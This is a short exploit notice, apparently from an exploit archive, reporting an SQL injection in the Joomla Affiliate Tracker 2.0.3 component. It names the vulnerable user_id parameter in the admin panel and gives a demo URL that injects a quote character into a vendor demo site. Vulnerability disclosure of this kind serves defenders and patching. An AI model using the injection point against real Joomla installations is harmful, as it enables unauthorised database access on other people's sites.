Home / os / winmobile

Joomla Affiliate Tracker 2.0.3 SQL Injection

Posted on 13 June 2016

###################### # Exploit Title : Joomla com_affiliatetracker - SQL Injection # Exploit Author : Persian Hack Team # Vendor Homepage : http://extensions.joomla.org/extension/affiliate-tracker # Category: [ Webapps ] # Tested on: [ Win ] # Version: 2.0.3 # Date: 2016/06/13 ###################### # # PoC: # First Login To Panel And Go To Affiliate Tracker # user_id[] Parameter Vulnerable to SQL Injection # Demo : # http://demo.joomlathat.com/administrator/index.php?option=com_affiliatetracker&controller=conversions&user_id=398%27 # Image: http://www.uplooder.net/img/image/51/a4c21d46eac16c4646efbebaea7e551f/com-affiliatetracker.png # ###################### # Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com) # Greetz : T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members # Homepage : persian-team.ir ######################

 

TOP